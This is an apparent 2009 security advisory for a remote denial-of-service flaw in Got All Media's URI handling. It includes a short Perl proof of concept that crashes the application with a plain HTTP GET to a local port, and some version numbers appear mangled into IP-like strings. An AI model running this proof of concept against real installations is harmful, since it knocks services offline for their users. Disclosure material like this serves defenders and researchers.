Written by LiquidWorm
Friday, 20 February 2009 20:10
Got All Media URI Handling Remote Denial of Service Vulnerability
Feb 19 2009 12:00AM
Feb 20 2009 06:17PM
Got All Media Got All Media 7.0 3
Got All Media is prone to a remote denial-of-service vulnerability when processing URI requests.
Exploiting this issue allows remote attackers to cause denial-of-service conditions by crashing the application.
Got All Media 220.127.116.11 is vulnerable; other versions may be affected as well.
An attacker can use a browser to trigger this issue.
A proof of concept is available:
# Title: Got All Media 18.104.22.168 Remote Denial Of Service Exploit
# Product web page: http://www.gallm.com/default.aspx
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm [t00t] gmail [w00t] com
print "\n[*] t00ting...\n";
my $url = 'http://127.0.0.1:5550/t00t';
my $freeze = get $url;
die "Couldn't get $url" unless defined $freeze;
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
http://www.gallm.com (Got All Media)